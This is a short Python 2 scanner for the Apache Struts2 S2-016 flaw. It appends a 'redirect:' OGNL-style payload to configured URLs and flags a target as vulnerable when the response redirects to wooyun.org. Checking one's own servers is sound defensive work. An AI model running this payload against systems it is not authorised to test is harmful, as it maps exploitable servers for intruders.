struts_s2-016_vul_checker
最近的struts2漏洞检测脚本,现在各大网站应该已经修复。
#!/usr/bin/env python
# -*- coding=utf-8 -*-
'''
author: xjump.me#at#gmail.com
file: struts_s2-016_vul_checker.py
useage:
config the check_urls and
run `python struts_s2-016_vul_checker.py`
ref:
http://struts.apache.org/release/2.3.x/docs/s2-016.html
'''
check_urls=[
'http://localhost:8080/struts2-blank/example/HelloWorld.action',
]
import pycurl
import sys
import urlparse
headers = {
'User-Agent' : 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)',
'Accept' : 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language' : 'en-US,en;q=0.8',
'Accept-Charset' : 'utf-8;q=0.7,*;q=0.3',
'Connection' : 'keep-alive',
}
payload_scan=r"redirect:http://wooyun.org"
def line_sep():
print "*" * 79
class Handler:
def __init__(self):
self.data = ''
def write_callback(self, buf):
self.data = self.data + buf
def get_data(self):
return self.data
def debug_cb(debug_type, debug_msg):
print "debug(%d): %s" % (debug_type, debug_msg)
def progress_cb(total, existing, upload_t, upload_d):
pass
'''
try:
frac = float(existing)/float(total)
except:
frac = 0
sys.stdout.write("\r%s %3i%" % ("file", frac*100) )
'''
def do_scan(url, arg_timeout=1000, debug=0):
h_body = Handler()
h_head = Handler()
c = pycurl.Curl()
attack_url = url + "?" + payload_scan
t_url=urlparse.urlparse(url)
strScheme=t_url.scheme
strHost = t_url.netloc
strURL1 = t_url.path
c.setopt(c.URL, attack_url)
c.setopt(c.HTTPHEADER, ["Host: %s" % strHost] + [i[0]+": "+i[1] for i in headers.items()])
c.setopt(c.USERAGENT, headers["User-Agent"])
c.setopt(c.WRITEFUNCTION, h_body.write_callback)
c.setopt(c.HEADERFUNCTION, h_head.write_callback)
if debug:
c.setopt(c.NOPROGRESS, 0)
c.setopt(c.PROGRESSFUNCTION, progress_cb)
c.setopt(c.DEBUGFUNCTION, debug_cb)
c.setopt(c.VERBOSE,debug)
c.setopt(c.HTTPGET, 1)
c.setopt(c.TIMEOUT, arg_timeout)
c.setopt(c.HTTP_VERSION, c.CURL_HTTP_VERSION_1_1)
try:
c.perform()
except Exception as e:
#print e
return
c.reset()
c.close()
body = h_body.get_data()
head = h_head.get_data()
#print "[*] GET %s, response header is" % attack_url
#line_sep()
#print head
if r"Location: http://wooyun.org" in head:
print "\n[+] Vul found for %s.\n" % url
else:
print "[-] %s is Secured." % url
#line_sep()
#check
#print body
if __name__=="__main__":
for i in check_urls:
ret = do_scan(i, debug=0)